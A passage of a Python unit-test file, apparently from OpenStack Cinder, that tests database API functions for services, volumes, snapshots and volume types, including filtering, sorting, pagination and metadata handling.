'binary': 'fake_binary1',
'topic': 'fake_topic1',
'report_count': 4,
'disabled': True
}
db.service_update(self.ctxt, service['id'], new_values)
updated_service = db.service_get(self.ctxt, service['id'])
for key, value in new_values.iteritems():
self.assertEqual(value, updated_service[key])
def test_service_update_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_update, self.ctxt, 100500, {})
def test_service_get(self):
service1 = self._create_service({})
real_service1 = db.service_get(self.ctxt, service1['id'])
self._assertEqualObjects(service1, real_service1)
def test_service_get_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, 100500)
def test_service_get_by_host_and_topic(self):
service1 = self._create_service({'host': 'host1', 'topic': 'topic1'})
real_service1 = db.service_get_by_host_and_topic(self.ctxt,
host='host1',
topic='topic1')
self._assertEqualObjects(service1, real_service1)
def test_service_get_all(self):
values = [
{'host': 'host1', 'topic': 'topic1'},
{'host': 'host2', 'topic': 'topic2'},
{'disabled': True}
]
services = [self._create_service(vals) for vals in values]
disabled_services = [services[-1]]
non_disabled_services = services[:-1]
compares = [
(services, db.service_get_all(self.ctxt)),
(disabled_services, db.service_get_all(self.ctxt, True)),
(non_disabled_services, db.service_get_all(self.ctxt, False))
]
for comp in compares:
self._assertEqualListsOfObjects(*comp)
def test_service_get_all_by_topic(self):
values = [
{'host': 'host1', 'topic': 't1'},
{'host': 'host2', 'topic': 't1'},
{'host': 'host4', 'disabled': True, 'topic': 't1'},
{'host': 'host3', 'topic': 't2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:3]
real = db.service_get_all_by_topic(self.ctxt, 't1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_by_args(self):
values = [
{'host': 'host1', 'binary': 'a'},
{'host': 'host2', 'binary': 'b'}
]
services = [self._create_service(vals) for vals in values]
service1 = db.service_get_by_args(self.ctxt, 'host1', 'a')
self._assertEqualObjects(services[0], service1)
service2 = db.service_get_by_args(self.ctxt, 'host2', 'b')
self._assertEqualObjects(services[1], service2)
def test_service_get_by_args_not_found_exception(self):
self.assertRaises(exception.HostBinaryNotFound,
db.service_get_by_args,
self.ctxt, 'non-exists-host', 'a')
class DBAPIVolumeTestCase(BaseTest):
"""Unit tests for cinder.db.api.volume_*."""
def test_volume_create(self):
volume = db.volume_create(self.ctxt, {'host': 'host1'})
self.assertTrue(uuidutils.is_uuid_like(volume['id']))
self.assertEqual(volume.host, 'host1')
def test_volume_attached_invalid_uuid(self):
self.assertRaises(exception.InvalidUUID, db.volume_attached, self.ctxt,
42, 'invalid-uuid', None, '/tmp')
def test_volume_attached_to_instance(self):
volume = db.volume_create(self.ctxt, {'host': 'host1'})
instance_uuid = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
values = {'volume_id': volume['id'],
'instance_uuid': instance_uuid,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
instance_uuid, None, '/tmp')
volume = db.volume_get(self.ctxt, volume['id'])
attachment = db.volume_attachment_get(self.ctxt, attachment['id'])
self.assertEqual('in-use', volume['status'])
self.assertEqual('/tmp', attachment['mountpoint'])
self.assertEqual('attached', attachment['attach_status'])
self.assertEqual(instance_uuid, attachment['instance_uuid'])
self.assertIsNone(attachment['attached_host'])
def test_volume_attached_to_host(self):
volume = db.volume_create(self.ctxt, {'host': 'host1'})
host_name = 'fake_host'
values = {'volume_id': volume['id'],
'attached_host': host_name,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
None, host_name, '/tmp')
volume = db.volume_get(self.ctxt, volume['id'])
attachment = db.volume_attachment_get(self.ctxt, attachment['id'])
self.assertEqual('in-use', volume['status'])
self.assertEqual('/tmp', attachment['mountpoint'])
self.assertEqual('attached', attachment['attach_status'])
self.assertIsNone(attachment['instance_uuid'])
self.assertEqual(attachment['attached_host'], host_name)
def test_volume_data_get_for_host(self):
for i in xrange(3):
for j in xrange(3):
db.volume_create(self.ctxt, {'host': 'h%d' % i, 'size': 100})
for i in xrange(3):
self.assertEqual((3, 300),
db.volume_data_get_for_host(
self.ctxt, 'h%d' % i))
def test_volume_data_get_for_project(self):
for i in xrange(3):
for j in xrange(3):
db.volume_create(self.ctxt, {'project_id': 'p%d' % i,
'size': 100,
'host': 'h-%d-%d' % (i, j),
})
for i in xrange(3):
self.assertEqual((3, 300),
db.volume_data_get_for_project(
self.ctxt, 'p%d' % i))
def test_volume_detached_from_instance(self):
volume = db.volume_create(self.ctxt, {})
instance_uuid = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
values = {'volume_id': volume['id'],
'instance_uuid': instance_uuid,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
instance_uuid,
None, '/tmp')
db.volume_detached(self.ctxt, volume['id'], attachment['id'])
volume = db.volume_get(self.ctxt, volume['id'])
self.assertRaises(exception.VolumeAttachmentNotFound,
db.volume_attachment_get,
self.ctxt,
attachment['id'])
self.assertEqual('available', volume['status'])
def test_volume_detached_from_host(self):
volume = db.volume_create(self.ctxt, {})
host_name = 'fake_host'
values = {'volume_id': volume['id'],
'attach_host': host_name,
'attach_status': 'attaching', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'],
None, host_name, '/tmp')
db.volume_detached(self.ctxt, volume['id'], attachment['id'])
volume = db.volume_get(self.ctxt, volume['id'])
self.assertRaises(exception.VolumeAttachmentNotFound,
db.volume_attachment_get,
self.ctxt,
attachment['id'])
self.assertEqual('available', volume['status'])
def test_volume_get(self):
volume = db.volume_create(self.ctxt, {})
self._assertEqualObjects(volume, db.volume_get(self.ctxt,
volume['id']))
def test_volume_destroy(self):
volume = db.volume_create(self.ctxt, {})
db.volume_destroy(self.ctxt, volume['id'])
self.assertRaises(exception.VolumeNotFound, db.volume_get,
self.ctxt, volume['id'])
def test_volume_get_all(self):
volumes = [db.volume_create(self.ctxt,
{'host': 'h%d' % i, 'size': i})
for i in xrange(3)]
self._assertEqualListsOfObjects(volumes, db.volume_get_all(
self.ctxt, None, None, ['host'], None))
def test_volume_get_all_marker_passed(self):
volumes = [
db.volume_create(self.ctxt, {'id': 1}),
db.volume_create(self.ctxt, {'id': 2}),
db.volume_create(self.ctxt, {'id': 3}),
db.volume_create(self.ctxt, {'id': 4}),
]
self._assertEqualListsOfObjects(volumes[2:], db.volume_get_all(
self.ctxt, 2, 2, ['id'], ['asc']))
def test_volume_get_all_by_host(self):
volumes = []
for i in xrange(3):
volumes.append([db.volume_create(self.ctxt, {'host': 'h%d' % i})
for j in xrange(3)])
for i in xrange(3):
self._assertEqualListsOfObjects(volumes[i],
db.volume_get_all_by_host(
self.ctxt, 'h%d' % i))
def test_volume_get_all_by_host_with_pools(self):
volumes = []
vol_on_host_wo_pool = [db.volume_create(self.ctxt, {'host': 'foo'})
for j in xrange(3)]
vol_on_host_w_pool = [db.volume_create(
self.ctxt, {'host': 'foo#pool0'})]
volumes.append((vol_on_host_wo_pool +
vol_on_host_w_pool))
        # insert an additional record that doesn't belong to the same
        # host as 'foo' and make sure it is not included in the result
db.volume_create(self.ctxt, {'host': 'foobar'})
self._assertEqualListsOfObjects(volumes[0],
db.volume_get_all_by_host(
self.ctxt, 'foo'))
def test_volume_get_all_by_host_with_filters(self):
v1 = db.volume_create(self.ctxt, {'host': 'h1', 'display_name': 'v1',
'status': 'available'})
v2 = db.volume_create(self.ctxt, {'host': 'h1', 'display_name': 'v2',
'status': 'available'})
v3 = db.volume_create(self.ctxt, {'host': 'h2', 'display_name': 'v1',
'status': 'available'})
self._assertEqualListsOfObjects(
[v1],
db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'display_name': 'v1'}))
self._assertEqualListsOfObjects(
[v1, v2],
db.volume_get_all_by_host(
self.ctxt, 'h1',
filters={'display_name': ['v1', 'v2', 'foo']}))
self._assertEqualListsOfObjects(
[v1, v2],
db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'status': 'available'}))
self._assertEqualListsOfObjects(
[v3],
db.volume_get_all_by_host(self.ctxt, 'h2',
filters={'display_name': 'v1'}))
# No match
vols = db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'status': 'foo'})
self.assertEqual([], vols)
# Bogus filter, should return empty list
vols = db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'foo': 'bar'})
self.assertEqual([], vols)
def test_volume_get_all_by_group(self):
volumes = []
for i in xrange(3):
volumes.append([db.volume_create(self.ctxt, {
'consistencygroup_id': 'g%d' % i}) for j in xrange(3)])
for i in xrange(3):
self._assertEqualListsOfObjects(volumes[i],
db.volume_get_all_by_group(
self.ctxt, 'g%d' % i))
def test_volume_get_all_by_group_with_filters(self):
v1 = db.volume_create(self.ctxt, {'consistencygroup_id': 'g1',
'display_name': 'v1'})
v2 = db.volume_create(self.ctxt, {'consistencygroup_id': 'g1',
'display_name': 'v2'})
v3 = db.volume_create(self.ctxt, {'consistencygroup_id': 'g2',
'display_name': 'v1'})
self._assertEqualListsOfObjects(
[v1],
db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'display_name': 'v1'}))
self._assertEqualListsOfObjects(
[v1, v2],
db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'display_name': ['v1', 'v2']}))
self._assertEqualListsOfObjects(
[v3],
db.volume_get_all_by_group(self.ctxt, 'g2',
filters={'display_name': 'v1'}))
# No match
vols = db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'display_name': 'foo'})
self.assertEqual([], vols)
# Bogus filter, should return empty list
vols = db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'foo': 'bar'})
self.assertEqual([], vols)
def test_volume_get_all_by_project(self):
volumes = []
for i in xrange(3):
volumes.append([db.volume_create(self.ctxt, {
'project_id': 'p%d' % i}) for j in xrange(3)])
for i in xrange(3):
self._assertEqualListsOfObjects(volumes[i],
db.volume_get_all_by_project(
self.ctxt, 'p%d' % i, None,
None, ['host'], None))
def test_volume_get_by_name(self):
db.volume_create(self.ctxt, {'display_name': 'vol1'})
db.volume_create(self.ctxt, {'display_name': 'vol2'})
db.volume_create(self.ctxt, {'display_name': 'vol3'})
# no name filter
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'])
self.assertEqual(len(volumes), 3)
# filter on name
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'display_name': 'vol2'})
self.assertEqual(len(volumes), 1)
self.assertEqual(volumes[0]['display_name'], 'vol2')
# filter no match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'display_name': 'vol4'})
self.assertEqual(len(volumes), 0)
def test_volume_list_by_status(self):
db.volume_create(self.ctxt, {'display_name': 'vol1',
'status': 'available'})
db.volume_create(self.ctxt, {'display_name': 'vol2',
'status': 'available'})
db.volume_create(self.ctxt, {'display_name': 'vol3',
'status': 'in-use'})
# no status filter
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'])
self.assertEqual(len(volumes), 3)
# single match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'in-use'})
self.assertEqual(len(volumes), 1)
self.assertEqual(volumes[0]['status'], 'in-use')
# multiple match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'available'})
self.assertEqual(len(volumes), 2)
for volume in volumes:
self.assertEqual(volume['status'], 'available')
# multiple filters
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'available',
'display_name': 'vol1'})
self.assertEqual(len(volumes), 1)
self.assertEqual(volumes[0]['display_name'], 'vol1')
self.assertEqual(volumes[0]['status'], 'available')
# no match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'in-use',
'display_name': 'vol1'})
self.assertEqual(len(volumes), 0)
def _assertEqualsVolumeOrderResult(self, correct_order, limit=None,
sort_keys=None, sort_dirs=None,
filters=None, project_id=None,
marker=None,
match_keys=['id', 'display_name',
'volume_metadata',
'created_at']):
""""Verifies that volumes are returned in the correct order."""
if project_id:
result = db.volume_get_all_by_project(self.ctxt, project_id,
marker, limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
filters=filters)
else:
result = db.volume_get_all(self.ctxt, marker, limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
filters=filters)
self.assertEqual(len(correct_order), len(result))
for vol1, vol2 in zip(result, correct_order):
for key in match_keys:
val1 = vol1.get(key)
val2 = vol2.get(key)
# metadata is a dict, compare the 'key' and 'value' of each
if key == 'volume_metadata':
self.assertEqual(len(val1), len(val2))
val1_dict = dict((x.key, x.value) for x in val1)
val2_dict = dict((x.key, x.value) for x in val2)
self.assertDictMatch(val1_dict, val2_dict)
else:
self.assertEqual(val1, val2)
return result
def test_volume_get_by_filter(self):
"""Verifies that all filtering is done at the DB layer."""
vols = []
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g1',
'display_name': 'name_%d' % i,
'size': 1})
for i in xrange(2)])
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g1',
'display_name': 'name_%d' % i,
'size': 2})
for i in xrange(2)])
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g1',
'display_name': 'name_%d' % i})
for i in xrange(2)])
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g2',
'display_name': 'name_%d' % i,
'size': 1})
for i in xrange(2)])
# By project, filter on size and name
filters = {'size': '1'}
correct_order = [vols[1], vols[0]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
project_id='g1')
filters = {'size': '1', 'display_name': 'name_1'}
correct_order = [vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
project_id='g1')
# Remove project scope
filters = {'size': '1'}
correct_order = [vols[7], vols[6], vols[1], vols[0]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters)
filters = {'size': '1', 'display_name': 'name_1'}
correct_order = [vols[7], vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters)
# Remove size constraint
filters = {'display_name': 'name_1'}
correct_order = [vols[5], vols[3], vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
project_id='g1')
correct_order = [vols[7], vols[5], vols[3], vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters)
# Verify bogus values return nothing
filters = {'display_name': 'name_1', 'bogus_value': 'foo'}
self._assertEqualsVolumeOrderResult([], filters=filters,
project_id='g1')
self._assertEqualsVolumeOrderResult([], project_id='bogus')
self._assertEqualsVolumeOrderResult([], filters=filters)
self._assertEqualsVolumeOrderResult([], filters={'metadata':
'not valid'})
self._assertEqualsVolumeOrderResult([], filters={'metadata':
['not', 'valid']})
# Verify that relationship property keys return nothing, these
# exist on the Volumes model but are not columns
filters = {'volume_type': 'bogus_type'}
self._assertEqualsVolumeOrderResult([], filters=filters)
def test_volume_get_all_filters_limit(self):
vol1 = db.volume_create(self.ctxt, {'display_name': 'test1'})
vol2 = db.volume_create(self.ctxt, {'display_name': 'test2'})
vol3 = db.volume_create(self.ctxt, {'display_name': 'test2',
'metadata': {'key1': 'val1'}})
vol4 = db.volume_create(self.ctxt, {'display_name': 'test3',
'metadata': {'key1': 'val1',
'key2': 'val2'}})
vol5 = db.volume_create(self.ctxt, {'display_name': 'test3',
'metadata': {'key2': 'val2',
'key3': 'val3'},
'host': 'host5'})
db.volume_admin_metadata_update(self.ctxt, vol5.id,
{"readonly": "True"}, False)
vols = [vol5, vol4, vol3, vol2, vol1]
# Ensure we have 5 total instances
self._assertEqualsVolumeOrderResult(vols)
# No filters, test limit
self._assertEqualsVolumeOrderResult(vols[:1], limit=1)
self._assertEqualsVolumeOrderResult(vols[:4], limit=4)
# Just the test2 volumes
filters = {'display_name': 'test2'}
self._assertEqualsVolumeOrderResult([vol3, vol2], filters=filters)
self._assertEqualsVolumeOrderResult([vol3], limit=1,
filters=filters)
self._assertEqualsVolumeOrderResult([vol3, vol2], limit=2,
filters=filters)
self._assertEqualsVolumeOrderResult([vol3, vol2], limit=100,
filters=filters)
# metadata filters
filters = {'metadata': {'key1': 'val1'}}
self._assertEqualsVolumeOrderResult([vol4, vol3], filters=filters)
self._assertEqualsVolumeOrderResult([vol4], limit=1,
filters=filters)
self._assertEqualsVolumeOrderResult([vol4, vol3], limit=10,
filters=filters)
filters = {'metadata': {'readonly': 'True'}}
self._assertEqualsVolumeOrderResult([vol5], filters=filters)
filters = {'metadata': {'key1': 'val1',
'key2': 'val2'}}
self._assertEqualsVolumeOrderResult([vol4], filters=filters)
self._assertEqualsVolumeOrderResult([vol4], limit=1,
filters=filters)
# No match
filters = {'metadata': {'key1': 'val1',
'key2': 'val2',
'key3': 'val3'}}
self._assertEqualsVolumeOrderResult([], filters=filters)
filters = {'metadata': {'key1': 'val1',
'key2': 'bogus'}}
self._assertEqualsVolumeOrderResult([], filters=filters)
filters = {'metadata': {'key1': 'val1',
'key2': 'val1'}}
self._assertEqualsVolumeOrderResult([], filters=filters)
# Combination
filters = {'display_name': 'test2',
'metadata': {'key1': 'val1'}}
self._assertEqualsVolumeOrderResult([vol3], filters=filters)
self._assertEqualsVolumeOrderResult([vol3], limit=1,
filters=filters)
self._assertEqualsVolumeOrderResult([vol3], limit=100,
filters=filters)
filters = {'display_name': 'test3',
'metadata': {'key2': 'val2',
'key3': 'val3'},
'host': 'host5'}
self._assertEqualsVolumeOrderResult([vol5], filters=filters)
self._assertEqualsVolumeOrderResult([vol5], limit=1,
filters=filters)
def test_volume_get_no_migration_targets(self):
"""Verifies the unique 'no_migration_targets'=True filter.
This filter returns volumes with either a NULL 'migration_status'
or a non-NULL value that does not start with 'target:'.
"""
vol1 = db.volume_create(self.ctxt, {'display_name': 'test1'})
vol2 = db.volume_create(self.ctxt, {'display_name': 'test2',
'migration_status': 'bogus'})
vol3 = db.volume_create(self.ctxt, {'display_name': 'test3',
'migration_status': 'btarget:'})
vol4 = db.volume_create(self.ctxt, {'display_name': 'test4',
'migration_status': 'target:'})
# Ensure we have 4 total instances, default sort of created_at (desc)
self._assertEqualsVolumeOrderResult([vol4, vol3, vol2, vol1])
# Apply the unique filter
filters = {'no_migration_targets': True}
self._assertEqualsVolumeOrderResult([vol3, vol2, vol1],
filters=filters)
self._assertEqualsVolumeOrderResult([vol3, vol2], limit=2,
filters=filters)
filters = {'no_migration_targets': True,
'display_name': 'test4'}
self._assertEqualsVolumeOrderResult([], filters=filters)
def test_volume_get_all_by_filters_sort_keys(self):
# Volumes that will reply to the query
test_h1_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'available',
'host': 'h1'})
test_h1_error = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h1'})
test_h1_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h1'})
test_h2_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'available',
'host': 'h2'})
test_h2_error = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h2'})
test_h2_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h2'})
# Other volumes in the DB, will not match name filter
other_error = db.volume_create(self.ctxt, {'display_name': 'other',
'status': 'error',
'host': 'a'})
other_active = db.volume_create(self.ctxt, {'display_name': 'other',
'status': 'available',
'host': 'a'})
filters = {'display_name': 'test'}
# Verify different sort key/direction combinations
sort_keys = ['host', 'status', 'created_at']
sort_dirs = ['asc', 'asc', 'asc']
correct_order = [test_h1_avail, test_h1_error, test_h1_error2,
test_h2_avail, test_h2_error, test_h2_error2]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'desc', 'asc']
correct_order = [test_h1_error, test_h1_error2, test_h1_avail,
test_h2_error, test_h2_error2, test_h2_avail]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['desc', 'desc', 'asc']
correct_order = [test_h2_error, test_h2_error2, test_h2_avail,
test_h1_error, test_h1_error2, test_h1_avail]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# created_at is added by default if not supplied, descending order
sort_keys = ['host', 'status']
sort_dirs = ['desc', 'desc']
correct_order = [test_h2_error2, test_h2_error, test_h2_avail,
test_h1_error2, test_h1_error, test_h1_avail]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'asc']
correct_order = [test_h1_avail, test_h1_error, test_h1_error2,
test_h2_avail, test_h2_error, test_h2_error2]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Remove name filter
correct_order = [other_active, other_error,
test_h1_avail, test_h1_error, test_h1_error2,
test_h2_avail, test_h2_error, test_h2_error2]
self._assertEqualsVolumeOrderResult(correct_order, sort_keys=sort_keys,
sort_dirs=sort_dirs)
# No sort data, default sort of created_at, id (desc)
correct_order = [other_active, other_error,
test_h2_error2, test_h2_error, test_h2_avail,
test_h1_error2, test_h1_error, test_h1_avail]
self._assertEqualsVolumeOrderResult(correct_order)
def test_volume_get_all_by_filters_sort_keys_paginate(self):
        """Verifies sort order with pagination."""
# Volumes that will reply to the query
test1_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 1,
'status': 'available'})
test1_error = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 1,
'status': 'error'})
test1_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 1,
'status': 'error'})
test2_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 2,
'status': 'available'})
test2_error = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 2,
'status': 'error'})
test2_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 2,
'status': 'error'})
# Other volumes in the DB, will not match name filter
db.volume_create(self.ctxt, {'display_name': 'other'})
db.volume_create(self.ctxt, {'display_name': 'other'})
filters = {'display_name': 'test'}
# Common sort information for every query
sort_keys = ['size', 'status', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct volume order based on the sort keys
correct_order = [test1_error, test1_error2, test1_avail,
test2_error, test2_error2, test2_avail]
# Limits of 1, 2, and 3, verify that the volumes returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
            # Include the maximum number of volumes (i.e., 6) to ensure that
# the last query (with marker pointing to the last volume)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
vols = self._assertEqualsVolumeOrderResult(
correct, filters=filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = vols[-1]['id']
self.assertEqual(correct[-1]['id'], marker)
def test_volume_get_all_invalid_sort_key(self):
for keys in (['foo'], ['display_name', 'foo']):
self.assertRaises(exception.InvalidInput, db.volume_get_all,
self.ctxt, None, None, sort_keys=keys)
def test_volume_get_iscsi_target_num(self):
db.iscsi_target_create_safe(self.ctxt, {'volume_id': 42,
'target_num': 43})
self.assertEqual(43, db.volume_get_iscsi_target_num(self.ctxt, 42))
def test_volume_get_iscsi_target_num_nonexistent(self):
self.assertRaises(exception.ISCSITargetNotFoundForVolume,
db.volume_get_iscsi_target_num, self.ctxt, 42)
def test_volume_update(self):
volume = db.volume_create(self.ctxt, {'host': 'h1'})
ref_a = db.volume_update(self.ctxt, volume['id'],
{'host': 'h2',
'metadata': {'m1': 'v1'}})
volume = db.volume_get(self.ctxt, volume['id'])
self.assertEqual('h2', volume['host'])
self.assertEqual(dict(ref_a), dict(volume))
def test_volume_update_nonexistent(self):
self.assertRaises(exception.VolumeNotFound, db.volume_update,
self.ctxt, 42, {})
def test_volume_metadata_get(self):
metadata = {'a': 'b', 'c': 'd'}
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata})
self.assertEqual(metadata, db.volume_metadata_get(self.ctxt, 1))
def test_volume_metadata_update(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '5'}
should_be = {'a': '3', 'c': '2', 'd': '5'}
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata1})
db_meta = db.volume_metadata_update(self.ctxt, 1, metadata2, False)
self.assertEqual(should_be, db_meta)
def test_volume_metadata_update_delete(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '4'}
should_be = metadata2
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata1})
db_meta = db.volume_metadata_update(self.ctxt, 1, metadata2, True)
self.assertEqual(should_be, db_meta)
def test_volume_metadata_delete(self):
metadata = {'a': 'b', 'c': 'd'}
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata})
db.volume_metadata_delete(self.ctxt, 1, 'c')
metadata.pop('c')
self.assertEqual(metadata, db.volume_metadata_get(self.ctxt, 1))
def test_volume_glance_metadata_create(self):
volume = db.volume_create(self.ctxt, {'host': 'h1'})
db.volume_glance_metadata_create(self.ctxt, volume['id'],
'image_name',
u'\xe4\xbd\xa0\xe5\xa5\xbd')
glance_meta = db.volume_glance_metadata_get(self.ctxt, volume['id'])
for meta_entry in glance_meta:
if meta_entry.key == 'image_name':
image_name = meta_entry.value
self.assertEqual(u'\xe4\xbd\xa0\xe5\xa5\xbd', image_name)
class DBAPISnapshotTestCase(BaseTest):
"""Tests for cinder.db.api.snapshot_*."""
def test_snapshot_data_get_for_project(self):
actual = db.snapshot_data_get_for_project(self.ctxt, 'project1')
self.assertEqual(actual, (0, 0))
db.volume_create(self.ctxt, {'id': 1,
'project_id': 'project1',
'size': 42})
db.snapshot_create(self.ctxt, {'id': 1, 'volume_id': 1,
'project_id': 'project1',
'volume_size': 42})
actual = db.snapshot_data_get_for_project(self.ctxt, 'project1')
self.assertEqual(actual, (1, 42))
def test_snapshot_get_all(self):
db.volume_create(self.ctxt, {'id': 1})
snapshot = db.snapshot_create(self.ctxt, {'id': 1, 'volume_id': 1})
self._assertEqualListsOfObjects([snapshot],
db.snapshot_get_all(self.ctxt),
ignored_keys=['metadata', 'volume'])
def test_snapshot_get_by_host(self):
db.volume_create(self.ctxt, {'id': 1, 'host': 'host1'})
db.volume_create(self.ctxt, {'id': 2, 'host': 'host2'})
snapshot1 = db.snapshot_create(self.ctxt, {'id': 1, 'volume_id': 1})
snapshot2 = db.snapshot_create(self.ctxt, {'id': 2, 'volume_id': 2,
'status': 'error'})
self._assertEqualListsOfObjects([snapshot1],
db.snapshot_get_by_host(
self.ctxt,
'host1'),
ignored_keys='volume')
self._assertEqualListsOfObjects([snapshot2],
db.snapshot_get_by_host(
self.ctxt,
'host2'),
ignored_keys='volume')
self._assertEqualListsOfObjects([],
db.snapshot_get_by_host(
self.ctxt,
'host2', {'status': 'available'}),
ignored_keys='volume')
self._assertEqualListsOfObjects([snapshot2],
db.snapshot_get_by_host(
self.ctxt,
'host2', {'status': 'error'}),
ignored_keys='volume')
def test_snapshot_metadata_get(self):
metadata = {'a': 'b', 'c': 'd'}
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata})
self.assertEqual(metadata, db.snapshot_metadata_get(self.ctxt, 1))
def test_snapshot_metadata_update(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '5'}
should_be = {'a': '3', 'c': '2', 'd': '5'}
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata1})
db_meta = db.snapshot_metadata_update(self.ctxt, 1, metadata2, False)
self.assertEqual(should_be, db_meta)
def test_snapshot_metadata_update_delete(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '5'}
should_be = metadata2
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata1})
db_meta = db.snapshot_metadata_update(self.ctxt, 1, metadata2, True)
self.assertEqual(should_be, db_meta)
def test_snapshot_metadata_delete(self):
metadata = {'a': '1', 'c': '2'}
should_be = {'a': '1'}
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata})
db.snapshot_metadata_delete(self.ctxt, 1, 'c')
self.assertEqual(should_be, db.snapshot_metadata_get(self.ctxt, 1))
class DBAPIVolumeTypeTestCase(BaseTest):
"""Tests for the db.api.volume_type_* methods."""
def setUp(self):
self.ctxt = context.get_admin_context()
super(DBAPIVolumeTypeTestCase, self).setUp()
def test_volume_type_create_exists(self):
vt = db.volume_type_create(self.ctxt, {'name': 'n1'})
self.assertRaises(exception.VolumeTypeExists,
db.volume_type_create,
self.ctxt,
{'name': 'n1'})
self.assertRaises(exception.VolumeTypeExists,
db.volume_type_create,
self.ctxt,
{'name': 'n2', 'id': vt['id']})
def test_get_volume_type_extra_specs(self):
# Ensure that volume type extra specs can be accessed after
# the DB session is closed.
vt_extra_specs = {'mock_key': 'mock_value'}
vt = db.volume_type_create(self.ctxt,
{'name': 'n1',
'extra_specs': vt_extra_specs})
volume_ref = db.volume_create(self.ctxt, {'volume_type_id': vt.id})
session = sqlalchemy_api.get_session()
volume = sqlalchemy_api._volume_get(self.ctxt, volume_ref.id,
session=session)
session.close()
actual_specs = {}
for spec in volume.volume_type.extra_specs:
actual_specs[spec.key] = spec.value
self.assertEqual(vt_extra_specs, actual_specs)
class DBAPIEncryptionTestCase(BaseTest):
